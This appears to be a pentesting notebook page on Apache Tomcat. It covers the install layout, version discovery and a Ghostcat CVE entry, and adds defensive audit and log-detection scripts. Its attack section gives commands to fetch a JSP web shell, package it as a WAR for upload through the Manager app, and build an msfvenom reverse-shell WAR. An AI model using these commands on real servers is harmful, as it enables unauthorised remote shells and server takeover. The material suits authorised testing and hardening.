
# Tomcat

Apache Tomcat is an open-source Java servlet container and web server: it hosts web applications written in Java (servlets and JSP pages), usually deployed as WAR files.

## Default File Structure

```
/opt/tomcat/  (Tomcat installation directory)
├── bin/          (Startup, shutdown, and management scripts)
│   ├── catalina.sh  (Main control script for Tomcat)
│   ├── startup.sh   (Starts Tomcat)
│   ├── shutdown.sh  (Stops Tomcat)
│   ├── setenv.sh    (Optional, sets environment variables)
│   ├── digest.sh    (Generates hashed passwords)
│   ├── version.sh   (Shows Tomcat version)
│   ├── tool-wrapper.sh  (Helper script for Java tools)
│   ├── tomcat-juli.jar  (Tomcat logging utility)
│   ├── *.bat  (Windows equivalent of shell scripts)
├── conf/         (Configuration files)
│   ├── server.xml        (Main configuration file)
│   ├── web.xml           (Default web application settings)
│   ├── tomcat-users.xml  (User roles and authentication)
│   ├── tomcat-users.xsd  (XML schema definition for `tomcat-users.xml`)
│   ├── logging.properties (Logging configuration)
│   ├── catalina.policy   (Security policy for Java permissions)
│   ├── catalina.properties (Catalina internal properties, e.g. class loader paths)
│   ├── context.xml       (Default context settings)
│   ├── jaspic-providers.xml (JASPIC authentication provider configuration)
│   ├── jaas.config       (Java Authentication and Authorization Service login configuration)
├── lib/          (Core Tomcat libraries)
│   ├── servlet-api.jar  (Servlet API)
│   ├── tomcat-api.jar   (Tomcat core API)
│   ├── tomcat-util.jar  (Utility classes)
│   ├── ecj-*.jar        (Eclipse Compiler for JSP)
│   ├── jsp-api.jar      (JSP API)
│   ├── websocket-api.jar (WebSocket API)
│   ├── *.jar            (Additional dependencies)
├── logs/         (Log files)
│   ├── catalina.out    (Main log file)
│   ├── localhost.log   (Logs specific to the localhost container)
│   ├── manager.log     (Logs for Tomcat Manager application)
│   ├── host-manager.log (Logs for Host Manager application)
│   ├── *.log           (Other logs)
├── temp/         (Temporary files)
│   ├── tomcat.*        (Temporary data storage for Tomcat)
├── webapps/      (Deployed applications)
│   ├── ROOT/         (Default root application)
│   │   ├── index.jsp  (Default welcome page)
│   │   ├── WEB-INF/   (Configuration files for the app)
│   ├── manager/      (Tomcat Manager Web UI)
│   │   ├── images/      (Icons and graphics for the UI)
│   │   ├── META-INF/    (Metadata and security settings)
│   │   └── WEB-INF/     (Application configurations)
│   │       ├── web.xml  (Defines servlet settings for the Manager app)
│   ├── host-manager/ (Tomcat Virtual Host Manager)
│   ├── docs/        (Tomcat documentation)
│   ├── examples/    (Example applications)
│   ├── myapp.war    (Custom deployed application - .war file)
│   ├── <CUSTOMAPP>/   (Custom web application)
│   │   ├── images/      (Custom app images)
│   │   ├── index.jsp    (Main entry point of the app)
│   │   ├── META-INF/
│   │   │   └── context.xml  (Application-specific context configuration)
│   │   ├── status.xsd   (XML Schema for status validation)
│   │   └── WEB-INF/
│   │       ├── jsp/
│   │       │   └── admin.jsp   (Admin page JSP)
│   │       ├── lib/
│   │       │   └── jdbc_drivers.jar   (Database driver)
│   │       ├── classes/
│   │       │   └── AdminServlet.class  (Compiled Servlet for Admin)
│   │       └── web.xml    (Defines servlet settings for the custom app)
├── work/         (Compiled JSP files and runtime data)
│   ├── Catalina/   (Compiled Java files for JSPs)
│   │   ├── localhost/
│   │   │   ├── _ (Default webapp compilation)
│   │   │   ├── myapp/ (Compiled JSPs for a deployed application)
├── LICENSE       (License information)
├── NOTICE        (Legal notices)
└── RELEASE-NOTES (Release notes)
```

## Manual Enumeration

### Version

<table data-header-hidden><thead><tr><th width="183"></th><th></th></tr></thead><tbody><tr><td>Error page (the default 404 page prints the version in its footer)</td><td><code>http://&#x3C;DOMAIN>:&#x3C;PORT>/invalid</code></td></tr><tr><td><code>/docs</code></td><td><code>curl -s http://&#x3C;DOMAIN>:&#x3C;PORT>/docs/ | grep Tomcat</code></td></tr></tbody></table>
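The two checks in the table can be turned into a repeatable test, for example when verifying that a hardening change actually removed the version banner. The script below is an added example, not code from the original page: it extracts the `Apache Tomcat/x.y.z` string from the default error page and the `/docs` index. The HTTP bodies are constructed samples modelled on those pages so it runs offline, and `fetch_body()` is a hypothetical `urllib` wrapper for live use.

```python
"""Spot Tomcat version disclosure in the two places the table above names.

Added example, not code from the original page. The HTTP bodies below are
constructed samples modelled on the default error page (ErrorReportValve)
and the bundled /docs index; only the regexes matter for a real response.
fetch_body() is a hypothetical helper for live checks and is not exercised
by the samples.
"""
import re
import urllib.error
import urllib.request
from typing import Dict, Optional

# Default error pages print "Apache Tomcat/<version>" in a footer <h3>;
# the docs index prints "Apache Tomcat <major> (<version>)" in its <title>.
VERSION_PATTERNS = (
    re.compile(r"Apache Tomcat/(\d+\.\d+\.\d+)"),
    re.compile(r"Apache Tomcat \d+ \((\d+\.\d+\.\d+)\)"),
)

# Constructed sample: default 404 body of an unhardened install.
SAMPLE_404 = (
    '<!doctype html><html lang="en"><head>'
    "<title>HTTP Status 404 \u2013 Not Found</title></head><body>"
    '<h1>HTTP Status 404 \u2013 Not Found</h1><hr class="line" />'
    "<p><b>Type</b> Status Report</p>"
    "<p><b>Description</b> The origin server did not find a current "
    "representation for the target resource.</p>"
    '<hr class="line" /><h3>Apache Tomcat/9.0.30</h3></body></html>'
)

# Constructed sample: the same 404 after showServerInfo="false" on the
# ErrorReportValve, which drops the version footer.
SAMPLE_404_HARDENED = (
    '<!doctype html><html lang="en"><head>'
    "<title>HTTP Status 404 \u2013 Not Found</title></head><body>"
    '<h1>HTTP Status 404 \u2013 Not Found</h1><hr class="line" />'
    "<h3></h3></body></html>"
)

# Constructed sample: head of the bundled /docs/ index page.
SAMPLE_DOCS = (
    "<html><head><title>Apache Tomcat 9 (9.0.30) - Documentation Index"
    "</title></head><body><h1>Apache Tomcat 9</h1></body></html>"
)


def extract_version(body: str) -> Optional[str]:
    """Return the disclosed version string, or None if the body hides it."""
    for pattern in VERSION_PATTERNS:
        match = pattern.search(body)
        if match:
            return match.group(1)
    return None


def disclosure_report(bodies: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Map each named response to the version it leaks (None = no leak)."""
    return {name: extract_version(body) for name, body in bodies.items()}


def fetch_body(url: str, timeout: float = 5.0) -> str:
    """Hypothetical live fetch: returns the body even for 4xx responses,
    because the error page is exactly what we want to inspect."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    report = disclosure_report({
        "error-page": SAMPLE_404,
        "error-page-hardened": SAMPLE_404_HARDENED,
        "docs": SAMPLE_DOCS,
    })
    for name, version in report.items():
        print(f"{name}: {version or 'no version disclosed'}")
```

On the defensive side, the two leaks have distinct fixes: the error-page footer disappears when `server.xml` declares `<Valve className="org.apache.catalina.valves.ErrorReportValve" showReport="false" showServerInfo="false"/>` inside the `Host`, and the `/docs` leak goes away by removing the `docs` (and `examples`) web applications from `webapps/` on production hosts.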

## Attacks

Tomcat ships with a web-based Manager application for deploying and controlling web applications. It is available at `/manager/html` by default, and only users assigned the `manager-gui` role are allowed to access it. Valid manager credentials can be used to upload a packaged web application (a `.war` file) and so compromise the server. A WAR (Web Application Archive) is a zip-packaged Java web application that Tomcat deploys as a unit, which makes it a quick way to ship a web application.
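Because the whole attack hinges on who holds a manager role, the first thing to review on a host is `conf/tomcat-users.xml`. The script below is an added example, not code from the original page: it lists every user holding a Manager/Host-Manager role, flags passwords that are not in the `salt$iterations$hash` shape produced by `bin/digest.sh` (a heuristic; a realm with no `CredentialHandler` stores plaintext), and flags the combination of `manager-gui` with `manager-script`/`manager-jmx` that Tomcat's Manager documentation advises against. The XML is a constructed sample with placeholder credentials.

```python
"""Audit conf/tomcat-users.xml for risky Manager-app role assignments.

Added example, not code from the original page. The XML below is a
constructed sample; the password values in it are placeholders. The
hashed-password check is a heuristic: bin/digest.sh emits values shaped
"<salt>$<iterations>$<hash>", so anything else is treated as plaintext.
"""
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List

TOMCAT_NS = "{http://tomcat.apache.org/xml}"

# Roles that grant control over deployments or the container itself.
MANAGER_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Constructed sample (placeholder credentials, not real ones).
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="app-user"/>
  <user username="deploy" password="plaintext-placeholder" roles="manager-gui,manager-script"/>
  <user username="ops" password="8a5f1e2d3c4b5a69$100000$7b2d4e6f8a1c3e5d" roles="manager-gui"/>
  <user username="app" password="plaintext-placeholder" roles="app-user"/>
</tomcat-users>"""


def looks_hashed(password: str) -> bool:
    """Heuristic for digest.sh output: salt$iterations$hash."""
    parts = password.split("$")
    return len(parts) == 3 and parts[1].isdigit()


def audit_users(xml_text: str) -> Dict[str, List[str]]:
    """Return {username: sorted findings} for every user that needs attention."""
    root = ET.fromstring(xml_text)
    findings: Dict[str, List[str]] = {}
    # Tolerate files written with or without the tomcat.apache.org namespace.
    users = list(root.iter(TOMCAT_NS + "user")) + list(root.iter("user"))
    for user in users:
        name = user.get("username", "?")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        issues: List[str] = []
        privileged = sorted(roles & MANAGER_ROLES)
        if privileged:
            issues.append("manager-role:" + ",".join(privileged))
        if not looks_hashed(user.get("password", "")):
            issues.append("plaintext-password")
        # The HTML manager is CSRF-protected, the text/JMX interfaces are not;
        # Tomcat's docs therefore advise never giving one user both kinds.
        if "manager-gui" in roles and roles & {"manager-script", "manager-jmx"}:
            issues.append("gui-and-script-roles-combined")
        if issues:
            findings[name] = sorted(issues)
    return findings


if __name__ == "__main__":
    # Pass a real file path to audit it; with no argument the sample is used.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_USERS_XML
    for username, issues in audit_users(text).items():
        print(f"{username}: {', '.join(issues)}")
```

Run it against `/opt/tomcat/conf/tomcat-users.xml` (path from the layout above) to get a per-user list; an empty result means no manager roles are assigned, which is the right state for a production host that deploys by copying WARs into `webapps/` rather than through the Manager.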

{% code overflow="wrap" %}

```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
```

{% endcode %}

Click `Browse` to select the `.war` file, then click `Deploy`.\
Once the file is uploaded through the manager GUI, a `/backup` application appears in the applications table. Clicking `backup` redirects to `http://<DOMAIN>:<PORT>/backup/`; the web shell is reached by appending `cmd.jsp` to that URL.

A reverse-shell WAR can also be generated with [msfvenom](/rednote/pentesting-process/software-attacks/shellcode.md#msfvenom) and deployed the same way:

{% code overflow="wrap" %}

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > backup.war
```

{% endcode %}
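Both deployment paths above (the HTML upload form and a WAR pushed to the text interface) leave a distinctive trail in Tomcat's access log, and the newly created context is then requested by the same client. The detector below is an added example, not code from the original page: it parses lines in the default `AccessLogValve` pattern (`%h %l %u %t "%r" %s %b`), alerts on `POST /manager/html/upload` and `PUT /manager/text/deploy`, and then alerts on the first request to any context that did not exist before a deployment. The log lines are constructed, and the baseline context list is taken from the stock `webapps/` layout shown earlier on this page.

```python
"""Flag Manager-app deployments and follow-on requests in a Tomcat access log.

Added example, not code from the original page. It reads lines in the
default AccessLogValve pattern (%h %l %u %t "%r" %s %b), raises an alert
for each upload through /manager/html/upload or deploy through
/manager/text/deploy, and then for requests to any context that did not
exist before that deployment. SAMPLE_LOG is constructed.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# The two ways of deploying a WAR through the Manager app: the HTML form
# and the text interface.
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy")

# Contexts present on a stock install (see the webapps/ layout above).
BASELINE_CONTEXTS = {"/", "/manager", "/host-manager", "/docs", "/examples"}

# Constructed sample log (addresses, user and timestamps are made up).
SAMPLE_LOG = """\
10.0.0.5 - tomcat [12/Mar/2024:10:15:02 +0000] "GET /manager/html HTTP/1.1" 200 15234
10.0.0.5 - tomcat [12/Mar/2024:10:15:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 18011
10.0.0.5 - - [12/Mar/2024:10:16:01 +0000] "GET /backup/cmd.jsp HTTP/1.1" 200 512
10.0.0.9 - tomcat [12/Mar/2024:10:17:11 +0000] "PUT /manager/text/deploy?path=/backup&update=true HTTP/1.1" 200 88
192.168.1.20 - - [12/Mar/2024:10:18:00 +0000] "GET /docs/ HTTP/1.1" 200 8000
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one access-log line into its fields; {} if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else {}


def context_of(path: str) -> str:
    """First path segment, e.g. '/backup/cmd.jsp' -> '/backup'."""
    segments = path.split("/")
    return "/" + segments[1] if len(segments) > 1 and segments[1] else "/"


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return alerts in log order: manager deployments, then new-context hits."""
    alerts: List[Dict[str, str]] = []
    known_contexts = set(BASELINE_CONTEXTS)
    deploy_seen = False
    for raw in lines:
        rec = parse_line(raw)
        if not rec:
            continue
        parts = urlsplit(rec["target"])
        path, query = parts.path, parse_qs(parts.query)
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PREFIXES):
            # The text interface names the context in ?path=; the HTML upload
            # takes it from the WAR filename, which the access log never shows.
            alerts.append({
                "rule": "manager-deploy", "host": rec["host"], "user": rec["user"],
                "time": rec["time"],
                "context": query.get("path", ["(from WAR filename)"])[0],
            })
            deploy_seen = True
            continue
        ctx = context_of(path)
        if deploy_seen and ctx not in known_contexts and int(rec["status"]) < 400:
            alerts.append({
                "rule": "post-deploy-new-context", "host": rec["host"],
                "user": rec["user"], "time": rec["time"], "context": ctx,
            })
        known_contexts.add(ctx)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The same events are also recorded server-side in `logs/manager.log` (deployment messages from the Manager app) and `logs/catalina.out` (context start messages), so the access-log rule is best paired with a check that a context started which nobody change-managed. On hosts that do not need remote deployment, undeploying `manager` and `host-manager` removes the whole path.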

## CVE

<table><thead><tr><th width="223"></th><th></th></tr></thead><tbody><tr><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1938">CVE-2020-1938</a></td><td><a href="https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi">Ghostcat</a><br>Unauthenticated local file inclusion through the AJP connector in all Tomcat versions before 9.0.31, 8.5.51, and 7.0.100. The exploit can only read files and directories inside the deployed web applications, not arbitrary paths on the host.</td></tr></tbody></table>
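Exposure to Ghostcat depends on two things that can be checked without touching the service: the release in use against the fixed versions in the table, and whether `conf/server.xml` still enables an AJP/1.3 connector that listens beyond loopback or without a shared secret. The script below is an added example, not code from the original page. Both `server.xml` documents are constructed samples, the `secret` value is a placeholder, and the `secret`/`secretRequired` attributes are the ones introduced with the fixed releases (`requiredSecret` is the older spelling that the check also accepts).

```python
"""Check a server.xml and a version string for Ghostcat (CVE-2020-1938) exposure.

Added example, not code from the original page. Two checks: whether the
version is at or above the fixed releases the table names (9.0.31,
8.5.51, 7.0.100), and whether an enabled AJP/1.3 connector is reachable
beyond loopback or has no shared secret. Both server.xml documents are
constructed samples; the secret value is a placeholder. ET.fromstring
skips commented-out connectors, which is right: a commented-out
connector is not listening.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Earliest fixed release per branch, from the table above. Tomcat 8.0.x
# and anything older than 7.0.100 never received the fix.
FIXED = {9: (0, 31), 8: (5, 51), 7: (0, 100)}

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <!-- Legacy AJP connector: enabled, on every interface, no shared secret -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true"/>
    </Engine>
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <!-- AJP only for a local reverse proxy, with the secret the fixed releases support -->
    <Connector port="8009" protocol="AJP/1.3" address="::1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" redirectPort="8443"/>
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true"/>
    </Engine>
  </Service>
</Server>"""


def parse_version(version: str) -> Tuple[int, int, int]:
    """'9.0.30' -> (9, 0, 30); expects the three-part form Tomcat reports."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    return major, minor, patch


def ghostcat_fixed(version: str) -> bool:
    """True if this release contains the CVE-2020-1938 fix."""
    major, minor, patch = parse_version(version)
    if major >= 10:
        return True
    if major not in FIXED:
        return False
    return (minor, patch) >= FIXED[major]


def audit_ajp(xml_text: str) -> List[Dict[str, object]]:
    """One finding per AJP connector that is exposed or unauthenticated."""
    findings: List[Dict[str, object]] = []
    for conn in ET.fromstring(xml_text).iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        issues: List[str] = []
        # Before the fix an absent address meant every interface; fixed
        # releases default to loopback, but pinning it explicitly is cheaper
        # than remembering which branch a host runs.
        if conn.get("address") not in LOOPBACK:
            issues.append("address-not-pinned-to-loopback")
        if not (conn.get("secret") or conn.get("requiredSecret")):
            issues.append("no-shared-secret")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append("secret-explicitly-not-required")
        if issues:
            findings.append({"port": conn.get("port"), "issues": issues})
    return findings


if __name__ == "__main__":
    print("9.0.30 fixed:", ghostcat_fixed("9.0.30"))
    print("legacy config:", audit_ajp(SAMPLE_SERVER_XML))
    print("hardened config:", audit_ajp(HARDENED_SERVER_XML))
```

An empty finding list together with `ghostcat_fixed()` returning `True` is the state to aim for; where no reverse proxy speaks AJP at all, the cleanest fix is to delete the AJP connector from `server.xml` rather than to harden it.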

